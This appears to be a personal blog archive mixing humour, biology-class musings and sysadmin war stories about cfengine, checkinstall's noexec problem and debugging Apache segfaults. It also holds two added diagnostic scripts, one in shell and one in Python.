Atheism - There is no toy maker.
B'Hai - All toys are just fine with us.
Baptist - Once played, always played.
Branch Davidians - He who dies playing with the biggest toys, wins.
Capitalism - He who dies with the most toys, wins.
Catholicism - He who denies himself the most toys, wins.
Church of Christ - He whose toys make music, loses.
Church of Christ, Scientist - We are the toys.
Communism - Everyone gets the same number of toys, and you go straight to hell if we catch you selling yours.
Confucianism - Once a toy is dipped in the water, it is no longer dry.
Evolutionism - The toys made themselves.
Existentialism - Toys are a figment of your imagination.
Greek Orthodox - No, they were OURS first.
Hari Krishna - He who plays with the most toys, wins.
Hedonism - To heck with the rule book!? Let's play!
Hinduism - He who plays with bags of plastic farm animals, loses.
Jehovah's Witnesses - He who sells the most toys door-to-door, wins.
Mormonism - Every boy can have as many toys as he wants.
Non-denomination - just play with them.
Pentecostalism - He whose toys can talk, wins.
Polytheism - There are many toy makers.
Taoism - The doll is as important as the dumptruck.
Voodoo - Let me borrow that doll for a second.
----------------------
He Who Dies With The Most Toys - still dies..
Well now I'm getting trackback spam, so I'm disabling trackbacks...
It's interesting how my Anatomy & Physiology book inserts some sly humor every once in a while:
We have special names for bursitis at other locations, indicating the occupations most often associated with them. In "housemaid's knee," which accompanies prolonged kneeling, the affected bursa (fluid-filled pocket in connective tissue) lies between the patella and the skin. The condition of "student's elbow" is a form of bursitis that can result from propping your head up with your arm on a desk while you read your anatomy and physiology textbook.
It's weird, I always have a tendency to find problems in programs. And problems that to me should have been found a long time ago. I should have been a QA person.
I was playing with the latest release of cfengine (2.1.16) and came across a problem dealing with ordering of the configuration. Basically, you can have one operation, say installing a new /etc/ssh/sshd_config file, then trigger another, like restarting sshd, via a 'define' statement. These define classes so that another place in the configuration can check for them. So let's say I have a copy command:
copy:
    $(dist_dir)/sshd_config dest=/etc/ssh/sshd_config
        mode=644
        owner=root
        group=root
        server=$(policyhost)
        type=checksum
        define=sshd_reload
Notice the define of sshd_reload. Then I have a shellcommands clause:
shellcommands:
    sshd_reload::
        "/sbin/service sshd reload"
If I were to put this clause above the 'copy:', it would not be executed, because it would be 'too late'. Making things more complex, I have to designate the proper order in an 'actionsequence' option. Ordering becomes important and tricky when the configuration gets complex. There is an 'AddInstallable' option which is pretty much like function prototyping in C, where it would give cfengine a hint that sshd_reload may be defined by something and sections may need multiple passes in order to catch that. That's great in theory, but it just doesn't work in 2.1.16.
So off goes my message to the mailing list and the developer tells me to use the latest subversion tree. Yippee, alpha code of software I don't even understand on production servers. It fixed this problem, but brought out some others. First, the 'tidy' operation, which is used to delete files, seems to function differently in how it handles wildcards. The new code also seemed to have some debug statements which were making it noisy and emailing me crap. I had to go in and edit the code to remove them.
I don't know, whenever I run such development code, it's rather scary as I don't know what's broken. Oh well who gives a shit. What was rather neat is I was able to use cfengine to update cfengine itself.
I've been spending some time setting up cfengine and attempting its methodology. Essentially the idea is to keep centralized configuration for all servers and describing the 'state' each machine should be in. Cfengine works by making each system gradually approach the desired state, which may not be immediate.
One thing interesting about cfengine is it prefers not to notify you of system changes, but rather just perform the change and be quiet. For example, say /usr/java/bin should be mode 755. When cfengine notices that it isn't the right mode, it will fix it, but won't notify you unless you specifically request it. That may sound strange, but think about having a large amount of systems. The idea of looking through logcheck emails for each server is not a very good use of your time. In fact I hate getting emails from servers. They should be quiet already, always complaining.
cfengine setup is not for the weak hearted. You will have to read lots of documentation before even attempting to set it up. I still don't understand a lot of it, and setting up the authentication between servers is really more work than it should be. But once it's set up it is rather cool. You have a lot of freedom as to how to use the system. For example, say I have a custom /etc/ssh/sshd_config I want distributed to my servers. You could put the file on the cfengine server, and all the clients checksum it to see if there are any differences. If there are, it's copied over, and then sshd is restarted. Or you can instead set it up to edit the sshd_config file directly via stepwise text-editing commands. This sort of logic is all done with cfengine. I prefer the former to the latter, because I've already run into a situation where my text-editing logic was wrong and the file was being changed every time cfengine would run.
cfengine runs periodically on the clients to 'check' everything to see if it is in the right state utilizing a 'pull' strategy. If there are lots of things to check, it is very IO intensive. You can also use 'cfrun' to forcefully run the check on remote systems, utilizing a 'push' strategy.
One thing I don't really understand how to properly do is package management. cfengine has hooks for RPM, to check whether a version of a package is installed, and if not to do something about it (call up2date, your own script, etc). However it's rather convoluted and difficult to get done properly. You still need to set up your own RPM repository and such, and for basic updates it works ok.
Ideally your final cfengine configuration should be able to be applied to a fresh system, in order to bring it up to the proper state of the other servers. That's cool and all, but is hard to test unless you have free servers laying around. I'm doing this on production systems, but the client I am doing this for will be getting more servers. That will be a good test for cfengine. When designing the configuration, you have to keep this in mind: the idea of bringing ALL systems, including new and old, to the current state. You cannot think of patching one system, but have to look at the network as a whole. It's a different way of admin, and sometimes very difficult to do properly, but I think it may be worth the effort. It can lead to a pretty much hands-off network.
After reading this excerpt in a Biochemistry book, I could not help thinking about data storage:
A second remarkable characteristic of the self-replicating property of living organisms is the extraordinary stability of the genetic information stored in DNA. Very few early historical records prepared by man have survived for long, even though they have been etched in copper or stone and preserved against the elements. The Dead Sea scrolls and the Rosetta stone, for example, are only a few thousand years old. But there is good reason to believe that modern bacteria have nearly the same size, shape, and internal structure and contain the same kinds of building-block molecules and the same kinds of enzymes as those which lived hundreds of millions of years ago, despite the fact that bacteria, like all organisms, have been undergoing constant evolutionary change. Genetic information is preserved, not on a copper scroll or engraved in stone, but in the form of DNA, an organic molecule so fragile that when isolated in solution, it will break into many pieces if the solution is merely stirred or pipetted.
I came across this article on DNA computing. An interesting quote:
The data density of DNA is impressive. Just like a string of binary data is encoded with ones and zeros, a strand of DNA is encoded with four bases, represented by the letters A, T, C, and G. The bases (also known as nucleotides) are spaced every 0.35 nanometers along the DNA molecule, giving DNA a remarkable data density of nearly 18 Mbits per inch. In two dimensions, if you assume one base per square nanometer, the data density is over one million Gbits per square inch. Compare this to the data density of a typical high performance hard drive, which is about 7 Gbits per square inch -- a factor of over 100,000 smaller.
They go through an algorithm of solving the traveling salesman problem using DNA computation. Very cool stuff.
I had planned on seeing Waiting... this weekend, but the bad reviews turned me off to it. In fact I was going to see it, but then at the last minute I decided I would see Wallace and Gromit since it got good reviews.
Now I never even saw this show before. I just remember Chicken Run which I liked, and heard this was similar. Supposedly Wallace and Gromit is some famous show in England.
Anyhow, at first the choppy clay animation was kinda annoying on the big screen, but I started liking the story. It's definitely very weird and different from US cartoon flicks. What I learned is that this Wallace character is psychotic and Gromit is a masochist. I liked it a lot.
This week and last are exam weeks for me. I got a 104% on my Anatomy & Physiology exam. I was 1 out of 2 people who got that highest score. What I found really surprising is that 70 out of 180 people failed! Most of this first exam was basic chemistry stuff so I already knew a lot of it. However I guessed as to what type of molecule a 'heteroring' was heh, I guessed correctly. Our teacher gave a good sermon after finding out the grades. He made an interesting comment, "Would you want a D or F student prescribing medicine to your daughter?". And "You are better off going surfing and having a good time rather than come to class, waste money, and fail."
I got a 96% on a Biodiversity exam. I'm actually kinda peeved at that, because I changed an answer at the last moment to the wrong one. Still, I'm happy. What sucks at FAU is they require 94+ for an A. I've heard that at other schools like University of Florida, 90+ is an A. Not sure why FAU is trying to be tough.
I employed a memorizing strategy for these exams that associates weird stories with my notes. It truly works if you put the right effort and time into it. I think I have figured out how it works. Say there is some piece of data you want to remember. You've read about it so you have some vague idea of it, i.e. you have a certain pathway in your brain to get to the data, but it's difficult to recall. Now let's say you create a story linking that data. What you've done is essentially created another pathway to that data, so now you have two ways of getting to the information you need. It works as a reinforcer of the idea, as if there are now multiple paths your mind can take in parallel. The more of these pathways you can make, by other associations like vision and other senses, the stronger the data is and the faster you can get to it.
What's weird is I realized that even after forgetting the details of the story, I still remembered the target data. Not all of it, but certain key items. It's as if by creating those multiple pathways the data is now imprinted, and even if the original pathways don't exist, some new one is created that lets me get the information quickly. I find it pretty interesting. The hardest part in all of this is knowing WHAT to memorize. In class you take a shitload of notes and read countless chapters, but you don't know what you will be tested on. So part of this is understanding the teacher and his/her exams, how they discuss things in class, tone of voice, etc. I think it's easy to get drowned in information. You need to prune out key things that seem important. That was much more difficult when I was younger, but now it seems easier. This is probably why many of the younger people might be doing bad in class.
Tomorrow I have a chemistry exam, but chem has always been kinda easy for me. Not sure why, I don't even like chemistry that much. But the concepts just seem very natural and almost common sensical. I just cannot see myself as a chemist though. Class average for the last exam was 45%, and I got a 94.
Well this weekend I was bombarded with blog spam. It all came from dozens of IPs with random text in the comment like "interesting blog" and what not. What's interesting is the URLs they put in their spam point to other blogs, so I don't know what they are doing.
Anyhow, I'm pretty fed up with it and now I'm not allowing any URLs at all in comments, sorry. You'll have to clear the Url field on any comment posts as well.
So this afternoon I decided to take a nap at around 2pm or so, and I experienced something I've never really felt before that was just weird. I'm lying in bed, and my laptop is next to me and I'm listening to some music. I start to become paralyzed and cannot move at all. I start feeling something tugging on my left index finger, as if someone is pulling it. Then things just started getting even weirder. I sensed a real impending doom, as if something evil were in the room. Now it was sunny and my window shades were open, but it felt like some dark shadow came in.
I still could not move, and then felt a tugging on my right leg, as if someone were trying to drag me! I was jolted and pulled to the lower part of my bed. It felt like I was dead and someone was dragging my body. Whatever it was, it was trying to pull me off of the bed. I had a sense that some ghost was trying to mess with me.
Now, I'm not much of a believer in ghosts or what not. I'm not even scared of the dark, but this was probably the scariest feeling I ever had. I never felt anything like it. I literally thought I was dead, and even felt like I was possessed or something. Then all of a sudden I could move. My laptop wasn't there and I wasn't listening to music.
What happened was when I laid down, I fell asleep without even realizing it. The transition of wakeful to sleeping was so smooth that I didn't even notice and I thought my dream was real. I guess some may refer to this as a lucid dream. It all happened within 1 hour. It got me thinking. Some patients seem to remember their surgery when under anesthesia, and maybe the pulling of my leg had something to do with my ankle surgery. Maybe subconsciously I was going back to that operating table and remembering certain things.
Anyhow, it was very scary.
I recently was playing with Checkinstall on a Redhat Enterprise Linux 3 system set up by Rackspace. Checkinstall is a pretty nice system to create your own packages/RPMs from source very easily. However I had a weird problem that I had no clue how to fix. Whenever I ran checkinstall, I would get:
========================= Installation results ===========================
/usr/local/bin/installwatch:
/var/tmp/TGhbCPUHIWGChdBddpOX/installscript.sh: /bin/sh: bad interpreter: Permission denied
**** Installation failed. Aborting package creation.
Bad interpreter, permission denied? After a note to the mailing list, I was pointed to this thread about installing some game Enemy Territory and a similar problem. It turns out in /etc/fstab tmp was mounted with the noexec flag, which means nothing can be executed, hence rendering checkinstall nonfunctional.
Just goes to show sometimes the problem is right in front of you and you miss it.
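The check that would have found this quickly, as an added example that is not part of the original post: look up which mount entry covers the failing script's path and whether that entry carries noexec. The fstab contents below are constructed for illustration (the post does not show the real file), and the function names mount_opts_for and has_noexec are hypothetical.

```shell
#!/bin/sh
# Constructed sample in /etc/fstab format (not the real file from the post).
SAMPLE_FSTAB='# device     mountpoint  fstype  options              dump pass
LABEL=/      /           ext3    defaults             1 1
LABEL=/boot  /boot       ext3    defaults             1 2
/dev/sda5    /tmp        ext3    noexec,nosuid,nodev  1 2
/dev/sda6    /var        ext3    defaults             1 2
/dev/sda7    /var/tmp    ext3    noexec,nosuid,nodev  1 2
none         /proc       proc    defaults             0 0
/dev/sda3    swap        swap    defaults             0 0'

# Print the options field of the entry whose mount point is the longest
# prefix of the given absolute path. Fails (status 1) if nothing matches.
#   $1 = absolute path to check
#   $2 = mount table text (device, mount point, type, options, ...)
mount_opts_for() {
    printf '%s\n' "$2" | awk -v p="$1" '
        # Skip comments, blank lines and malformed entries.
        $1 ~ /^#/ || NF < 4 { next }
        {
            mp = $2
            # "/" covers everything; any other mount point must match the
            # path exactly or be followed by "/" (so /tmp does not match
            # /tmpfoo).
            if (mp == "/")
                covers = 1
            else
                covers = (p == mp || index(p, mp "/") == 1)
            if (covers && length(mp) > best_len) {
                best_len = length(mp)
                best = $4
            }
        }
        END {
            if (best_len > 0) print best
            else exit 1
        }'
}

# Return 0 if the path sits on a mount with noexec, 1 if it does not,
# 2 if no mount entry covers the path.
has_noexec() {
    noexec_opts=$(mount_opts_for "$1" "$2") || return 2
    case ",$noexec_opts," in
        *,noexec,*) return 0 ;;
        *)          return 1 ;;
    esac
}

# The script path from the error message in the post.
script=/var/tmp/TGhbCPUHIWGChdBddpOX/installscript.sh
if has_noexec "$script" "$SAMPLE_FSTAB"; then
    echo "$script is on a noexec mount:" \
         "$(mount_opts_for "$script" "$SAMPLE_FSTAB")"
    echo "The kernel refuses to execute it, so the shell reports" \
         "'bad interpreter: Permission denied'."
fi
```

On a live system, pass "$(cat /proc/mounts)" as the second argument instead, since it has the same first four fields and reflects what is actually mounted rather than what fstab requests.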
Computer Immunology is a strange term, but it's very interesting. I like the idea of systems being able to correct themselves. Approaching sysadmin from a research standpoint has always been interesting to me, but it's hard to link the theoretical to the practical. There are many things that need improvement in our sysadmin methodologies, and I for one welcome new techniques. As far as automation, I did write a pretty useful tool back in the day. That was when I was a Perl fanatic, and if you look at the code of that script I tried to use every Perl bell and whistle. I'm quite proud of it. Nowadays I would only do such a script in Python.
I've heard many things about cfengine, which is basically a non-standard approach to sysadmin. The idea is to keep a centralized 'configuration' for a system, with 'configuration' taking the broadest definition imaginable. It might include certain processes running (or not running), a version of Apache installed, permissions of files, etc. Essentially you update a configuration for a host, and cfengine takes care of applying that configuration to get the host up to the right state.
I read the tutorial for cfengine and I must say that's some ancient scripture. They are talking about rsh and rhosts for God's sake. Isn't this whole expert system methodology supposed to be cutting edge? If so why are we talking about /etc/hosts.equiv? Can we please come back to the cenozoic era?
I could not grasp any real-world practical examples from the docs, but there are definitely some articles and everyone seems to have a boner for this tool. From what I can understand, when cfengine runs, it analyzes the system state. This is a very IO-bound process, and it seems to me the more 'configuration' you have, the longer the analysis takes.
I wondered whether there are such systems written in Python, and came across a few rants about this. Long story short: no.
But Ruby, on the other hand, seems to give better results. I came across Puppet, which is purported to be a next generation cfengine. It seems to be in early development with lots of missing features that cfengine has, but it looks promising.
I'm not sure whether I'm willing to invest the time and effort to set up cfengine. Maybe I will, just to get a feel for this different sysadmin approach.
David Cronenberg is a director that can take something that we see in almost every TV show nowadays, a gunshot, and turn it into the most visceral and graphic scene imaginable. He pushes the limits on what the viewer will accept. Living in our society dulled by all the violence that pervades television, this director shows us just how disturbing death and violence really is, without actually pervading the movie with such scenes.
Cronenberg's movies are about the dark side of human nature, the animalistic, raw, uninhibited. He intertwines such polar ideas like violence and love, sex and anger, and does it in such a way that you begin to question what it means to be human. You start wondering whether you are anything more than an animal. Ebert said this movie is about the survival of the fittest, and I have to agree with that.
I really thought the movie was amazing. It plays like a chess game, each move coming closer and closer to a catharsis. It's as intelligent as A Clockwork Orange, and I highly recommend it for anyone that wants to come out the theatre with more questions than answers.
The trailer for this movie plays down the violence in the film. There are some quite graphic scenes and I wouldn't recommend any children seeing it.

The above picture is from a BBC show about violent behavior in humans. I found it hilarious. Scientists did a study and found that murderers had lower brain activity (glucose metabolism) in the prefrontal cortex. They say this correlates physical differences in brain structure to different types of behavior, notably violence. I can see it now, brain scanners at airport security checks. A flashing red evil light would blink whenever such a person came through. Then they could be re-routed to the psychotic plane, or short-plane, like the short-schoolbus for mentally challenged kids. Can we really delineate a murderer from a normal person with such scans? It seems rather simplistic to me.
There are all sorts of experiments on violent behavior. The show claimed that low serotonin levels and high dopamine levels in the brain directly contribute to violence. Serotonin acts as an inhibitor, to stop feelings and thoughts from getting out of control. Dopamine is just the opposite. So scientists are searching for genes regulating those chemicals, and one such gene is the one encoding MAO-A. Studies have found that not enough MAO-A could contribute to violent behavior, because it results in lower serotonin levels. But if the MAO-A gene is expressed, there is more serotonin, and there is less tendency for violence.
So what makes the gene expressed? Nurturing. It turns out if a child is nurtured by his mother and is taught at an early age about social bonding, love, bad behavior vs good behavior, the child has less of a tendency to grow up with problems. Take the same child and rear him without motherly love and he or she is more likely to turn out problematic. Is this really surprising? No, but to me the environmental influence on genetics is. There is a chemical basis to the behavior. Someone predisposed genetically to a certain behavior, or even disease, can in effect cancel out, or amplify, a gene based on their experience.
This is one of the many examples where genetics by itself cannot determine anything without also considering the experiences of the person. The person's experience itself determines whether the gene is expressed or not, and it ultimately shows that the brain can control gene expression. I find that rather amazing, and it shows the true power of the brain. It's not too hard to fathom the brain having control of other disease-related genes. Let's say you have a gene that predisposes you to cancer. Is there a possibility the brain can control whether that gene is expressed or not? I don't know, but it's interesting to think about.
No I'm not talking about the $3 per gallon kind. I'm referring to flatulence, or farting.
I was reading my Chemistry book and it mentioned a product called Beano, which is an over-the-counter supplement to prevent gas when eating certain foods. Why in the world my college Chemistry book would be advertising fart-reducing pills is beyond me, but it did get me interested.
Now I'm not saying I have a flatulence problem, but there are some foods that I eat and well, umm, let's just say I don't smell like Gucci afterwards. It's actually strange, because it's the healthy foods that give me gas. Things like lettuce, broccoli, other green things, sweet potatoes, certain breads, etc. So I pretty much hate eating such foods. I know they are good for me, but they always give me stomach problems. I can't stop eating such things because I'd like to have a healthy diet once in a while. It sucks because I can't even eat a salad without getting some problems.
They have a pretty good explanation of what gas is on Beano's website:
What causes gas?
The body does not digest and absorb some carbohydrates in the small intestine because of a shortage or absence of certain enzymes. This undigested food then passes from the small intestine to the large intestine where bacteria break down the food, producing gas. The most common symptoms of gas are flatulence, abdominal bloating and abdominal pain. In essence, the body lacks the enzymes needed to breakdown the carbohydrates found in some gassy foods like vegetables, legumes, grains, cereals, nuts, seeds and whole-grain breads. This is where Beano® steps in. Beano® contains a food enzyme from a natural source that works with your body’s digestion to breakdown the complex sugars in gassy foods making them more digestible, thereby preventing gas before it even starts.
My Biology teacher described this symbiotic bacterial environment in class. Basically, when you are born you don't really have much bacteria in your intestine. It takes some time to build up that "flora," as my professor put it. I don't know about you, but "flora" gives me the impression of a garden growing in my colon, and that's not very cool to say the least. I wonder if this bacteria can ever get out of control. Well if you know someone that farts a lot, then I think the bacteria have the upper hand in that person.
Wikipedia also has some more delightful information on gas. I especially like this bit:
If sitting on a cushioned surface, the gases can be directed into the open-cell polyurethane foam and somewhat quarantined. Following the fart, standing will not release the odor, in fact, the gases will be further pushed to the center of the cushion. The gases will not leak out and be detectable, unless the cushion is compressed again under the weight of another person. The use of this phenomenon as a practical joke is obvious.
Wikipedia always has funny wording, which changes a lot of course. Like on this page about sleep, the caption for the picture is "A human female sleeping." They've since changed that.
Anyway, Beano seemed like something worth trying, so I bought some at the local CVS. You are supposed to take it with your first bite when eating certain foods. All I can say is wow, it really works. I ate something that I knew for sure causes problems for me, and when I took Beano with it, there were no problems at all.
So buy yourself some if you have gas problems. Hm, I'm probably going to regret ever writing this.
I was reading a brochure from the Juvenon guys about aging experiments. They describe an experiment where scientists took away an enzyme that checks for mitochondrial DNA errors in mice, sort of like an error-checking enzyme. Not surprisingly, more and more cells in those mice started getting mutations in that DNA. What they observed however was that the mice appeared to have accelerated aging.
So they are claiming that mutations in mitochondrial DNA correlates to aging, and it would make sense to say that if you can limit those mutations, the cells might live longer. That's the selling point of Juvenon.
Disregarding whether the drug actually works, what I find interesting is this ability to accelerate aging in an animal by isolation of this enzyme. Cloning studies could benefit from this. When animals are cloned, the scientists do not really know whether it is truly healthy or not. Many problems arise later in the animal's life, so they have to watch it for a long time. It's very difficult to 'prove' that the cloning resulted in a successful organism. That's why we don't see such quick advances in cloning, it requires time for analysis of the organism. But what if we could accelerate the aging of the animal in this process? Basically doing a fast-forward through the animal's life in order to analyze its health without actually waiting and observing the normal lifespan. Then by doing many studies like this, we could find out the problems in the cloning techniques quicker and try new ones.
As far as Juvenon goes, I've tried taking it on and off. In some instances it made me a bit jumpy, like sort of 'wired.' I seemed more energetic and could think a bit faster, however it was difficult to relax. I had trouble sleeping when I took it before bed, so I won't do that again. I have a pretty messed up mind as it is, so this may be less than beneficial in my case. I can see how it would help older people though. I may continue taking it in lower than the recommended dosage. They suggest 2 tablets daily, but I might take 2 every 3 days or something like that. It's all about dosage and how your body responds to it.
I have also been taking fish oil supplements, which I feel is a good idea. I don't eat any fish at all, and there are many studies showing that such nutrients are beneficial. Honestly the best regimen for me involves napping during the day. I can think a lot sharper and feel a lot better. Polyphasia should not be slept on.
A pretty funny ad on 'examining' yourself.
This week I've been doing some consulting. A heavily loaded website (about 300 req/second) was having some issues such as Apache processes going haywire and eating up all CPU, and Apache processes segfaulting continuously. However, the site was functioning, and only when there were a lot of apaches eating up CPU did the system go to a crawl. The segfaults were of the apache child processes, not the main one.
The systems (load balanced) were hosted at Rackspace, and they pretty much set everything up for the customer, with things such as PHP, Apache, MySQL, etc. So the first thing I looked at were the haywire httpd processes eating up CPU. What could I do? Well an strace on it to start:
strace -p PID
But it didn't show anything, so it's hung somewhere before any other system call is made. Next thing, attach a gdb to that bitch:
gdb /usr/sbin/httpd PID
Then I did a 'bt' to show a backtrace of function calls and end up with:
0x00265383 in malloc_consolidate () from /lib/tls/libc.so.6
(gdb) bt
#0 0x00265383 in malloc_consolidate () from /lib/tls/libc.so.6
#1 0x00264b29 in _int_malloc () from /lib/tls/libc.so.6
#2 0x00263ecd in malloc () from /lib/tls/libc.so.6
#3 0x0040f500 in OpenSSLDie () from /lib/libcrypto.so.4
#4 0x0040fb5c in CRYPTO_malloc () from /lib/libcrypto.so.4
#5 0x006bd86b in ssl3_new () from /lib/libssl.so.4
#6 0x006c41e2 in tls1_new () from /lib/libssl.so.4
#7 0x006c5c66 in SSL_new () from /lib/libssl.so.4
#8 0x00639545 in ssl_engine_disable () from /etc/httpd/modules/mod_ssl.so
#9 0x080722bc in ap_run_pre_connection ()
#10 0x08072476 in ap_process_connection ()
#11 0x08066ac1 in ap_graceful_stop_signalled ()
#12 0x08066c14 in ap_graceful_stop_signalled ()
#13 0x08066eb9 in ap_graceful_stop_signalled ()
#14 0x08067550 in ap_mpm_run ()
#15 0x0806da2f in main ()
Hmm, ok so it's in some malloc call having to do with SSL. Well this site is not even using SSL, so the next thing I did was disable SSL. Not surprisingly, this reduced the frequency of the process going haywire, but did not get rid of them entirely. Something else is going on. From the malloc calls, it appears to have to do with maybe a memory leak or double-free happening somewhere. The next time it happened, it was hung in some pthread call, but not really related to any apache module. The problem is somewhat similar to this bug.
At this point I really had nowhere to go on this CPU issue. Apache was also segfaulting, and I guessed that the segfault problem is related to the CPU problem, so I decided to look into that. Now it gets really interesting. Trying to debug an Apache server getting 200-300 req/sec is not very fun. First of all you can have virtually no downtime before everyone starts realizing it, so whatever I needed to do, I had to do it with the least impact.
Apache reported to the logfiles something like:
[Thu Sep 15 04:14:26 2005] [notice] child pid 24195 exit signal Segmentation fault (11)
I also saw lines such as:
Allowed memory size of 16777216 bytes exhausted (tried to allocate 10 bytes)
free(): invalid pointer 0x9910020!
But this is not very helpful to me. What was PID 24195 doing? Which file was it serving? I first added PID logging to the logfiles with the '%P' custom log statement, similar to:
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" PID: %P" debuglog
Now I could correlate the segfaulted PIDs with the requests. But get this, it told me nothing! All of the crashes seemed to be random, some on .php files, some on even .jpg files! WTF? This told me more and more there is a memory leak somewhere, and the symptom is not showing up until much later. Next step, I want Apache to dump cores. This was done by adding a:
CoreDumpDirectory /tmp/cores
Great, now I have all these core files. I look at a backtrace:
gdb /usr/sbin/httpd core.12345
bt
#0 0x06ca51b0 in _zval_ptr_dtor (zval_ptr=0x53de8f3)
at /usr/src/debug/php-5.0.5/Zend/zend_execute_API.c:395
395 zv->refcount--;
(gdb) bt
#0 0x06ca51b0 in _zval_ptr_dtor (zval_ptr=0x53de8f3)
at /usr/src/debug/php-5.0.5/Zend/zend_execute_API.c:395
#1 0x06cb71f8 in zend_hash_destroy (ht=0x8821c3c)
at /usr/src/debug/php-5.0.5/Zend/zend_hash.c:519
#2 0x06cae8de in _zval_dtor (zvalue=0x881f47c)
at /usr/src/debug/php-5.0.5/Zend/zend_variables.c:52
#3 0x06ca51d8 in _zval_ptr_dtor (zval_ptr=0x53de8f3)
at /usr/src/debug/php-5.0.5/Zend/zend_execute_API.c:397
...
I see pretty much random location crashes, but they are all within PHP shutdown sequences. This is still not telling me much. The next thing I wanted to do was an strace on a working apache process and wait for it to crash. Luckily, the crashes were so frequent, I could strace on literally any apache PID and after a few minutes would be guaranteed a segfault.
Now what I saw was interesting. Almost always before a segfault, I would see some Mysql traffic that involved trying to access a nonexistent table. It turns out some of the website's PHP code had some legacy stuff doing this. So I thought, ok a missing table is not supposed to segfault apache, but let's get this code fixed either way. After a note to the developers, it was fixed. And guess what? There was a significant decrease in the number of segfaults per minute. Before it was about 1 every second, now it was 1 every minute. Clearly something was related to mysql, but at this point in my debugging process I just did not realize it.
All of this has been compiled and set up by Rackspace. During all of this, I'm opening tickets on their system and having them look into the problem. They are doing their own debugging, and even late one evening ran apache within a gdb and watched it. They pretty much thought it was a bug in PHP, and asked us to report it to the PHP developers. Rackspace did do a lot of debugging and I was impressed with their work, but I felt this was just going in the wrong direction. We spent many days trying different debugging techniques, PHP versions, and what not. But still no luck. At one point we found one .php script that ALWAYS segfaulted, and it had to do with XML stuff. We installed stable XML/XSLT libraries and it went away for that script, but still segfaulted elsewhere.
Rackspace showed me some straces of their crashes. They were all meaningless except for one thing, I noticed that shortly before each crash, there was a mysql insert statement executed. The fact that a mysql 'table not found' had increased the segfaults got me thinking, could this be something related to mysql or libraries?
I did some searching and came across this bug, which explained that PHP might crash if it was compiled with one mysql library API version, but there is a different version on the server. The next thing I look at is phpinfo(). I see it was compiled with mysql libraries 3.23.58, however the mysqld running on the system was 4.1.11. I had a eureka moment. Could a change in data structures between the versions in the API cause some issues? I thought that could likely be the case.
It just so turns out, that when Rackspace compiled PHP, they did so on a 'build host', which had mysql 3.23.58. Then they took this PHP and installed it on our server. I asked them to recompile it with the same mysql version that we have. Well they did so, and it has been about 5 hours and not one segfault. I think we got it. I'll have to watch it longer, but sometimes you just get a feeling that you just know you figured it out.
This all took place over a week. When I should've been studying, instead I was in the FAU library debugging apache crashes. It's all good though, because I am still learning something in the process. It is fun to do these kinds of things. Now I just need to make my invoice.
Lesson learned? Build systems are not very good if they differ from the target system.
Update: This did in fact fix the problem.
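The PID correlation step from this post (adding %P to the access log, then matching it against the "child pid N exit signal" lines in the error log) can be scripted as below. This is an added example, not code from the original post: the log lines are constructed samples in the post's formats, and the function names, the 10-minute window and the 3-request limit are assumptions.

```python
"""Correlate Apache child crashes with the requests each child last logged."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Error-log crash line, in the form quoted in the post.
CRASH_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] \[notice\] child pid (?P<pid>\d+) '
    r'exit signal (?P<sig>.+?) \((?P<num>\d+)\)')


def quoted(name):
    """Regex for a double-quoted log field that may contain \\" escapes."""
    return rf'"(?P<{name}>(?:[^"\\]|\\.)*)"'


# Access-log line in the post's "debuglog" LogFormat (ends in "PID: %P").
ACCESS_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] ' + quoted('req') +
    r' (?P<status>\d{3}) \S+ ' + quoted('ref') + ' ' + quoted('ua') +
    r' PID: (?P<pid>\d+)$')


def parse_crashes(lines):
    """Return sorted (time, pid, signal) tuples; other lines are skipped."""
    crashes = []
    for line in lines:
        m = CRASH_RE.match(line)
        if m:
            when = datetime.strptime(m['ts'], '%a %b %d %H:%M:%S %Y')
            crashes.append((when, int(m['pid']), m['sig']))
    return sorted(crashes)


def parse_access(lines):
    """Return {pid: [(time, request line, status), ...]} sorted by time."""
    by_pid = defaultdict(list)
    for line in lines:
        m = ACCESS_RE.match(line.rstrip('\n'))
        if m:
            # The error log has no UTC offset; both logs are server local
            # time, so drop the offset to make the timestamps comparable.
            when = datetime.strptime(
                m['ts'], '%d/%b/%Y:%H:%M:%S %z').replace(tzinfo=None)
            by_pid[int(m['pid'])].append((when, m['req'], int(m['status'])))
    for entries in by_pid.values():
        entries.sort()
    return by_pid


def correlate(crashes, by_pid, window=timedelta(minutes=10), limit=3):
    """For each crash, list the last requests that child logged before it.

    PIDs are reused, so requests older than the previous crash of the same
    PID belong to a different process and are excluded. Apache writes the
    access-log entry when a request completes, so the request in flight at
    the moment of the crash may be missing: treat the result as context.
    """
    report, previous_crash = [], {}
    for when, pid, sig in crashes:
        floor = max(when - window, previous_crash.get(pid, datetime.min))
        recent = [e for e in by_pid.get(pid, []) if floor < e[0] <= when]
        report.append({'time': when, 'pid': pid, 'signal': sig,
                       'last_requests': recent[-limit:]})
        previous_crash[pid] = when
    return report


# Constructed sample logs (not taken from the server in the post).
ERROR_LOG = """\
[Thu Sep 15 04:14:26 2005] [notice] child pid 24195 exit signal Segmentation fault (11)
free(): invalid pointer 0x9910020!
[Thu Sep 15 04:15:02 2005] [notice] child pid 24201 exit signal Segmentation fault (11)
[Thu Sep 15 04:20:40 2005] [notice] child pid 24195 exit signal Segmentation fault (11)
"""
ACCESS_LOG = """\
192.0.2.10 - - [15/Sep/2005:04:14:20 -0400] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0" PID: 24195
192.0.2.11 - - [15/Sep/2005:04:14:24 -0400] "GET /images/logo.jpg HTTP/1.1" 200 20480 "http://www.example.com/" "Mozilla/5.0" PID: 24195
192.0.2.12 - - [15/Sep/2005:04:14:58 -0400] "GET /news.php?id=7 HTTP/1.1" 200 7300 "-" "Mozilla/5.0" PID: 24201
192.0.2.13 - - [15/Sep/2005:04:18:10 -0400] "GET /feed.php HTTP/1.1" 200 900 "-" "Mozilla/5.0" PID: 24195
192.0.2.14 - - [15/Sep/2005:04:20:39 -0400] "GET /style.css HTTP/1.1" 304 - "-" "Mozilla/5.0" PID: 24195
"""

if __name__ == '__main__':
    crashes = parse_crashes(ERROR_LOG.splitlines())
    access = parse_access(ACCESS_LOG.splitlines())
    for item in correlate(crashes, access):
        print(item['time'], 'pid', item['pid'], item['signal'])
        for when, request, status in item['last_requests']:
            print('   ', when.time(), status, request)
```

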